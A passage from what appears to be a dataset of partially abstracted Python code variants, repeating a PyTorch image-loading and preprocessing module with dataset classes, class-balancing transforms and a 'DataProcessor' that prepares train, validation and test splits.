bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n 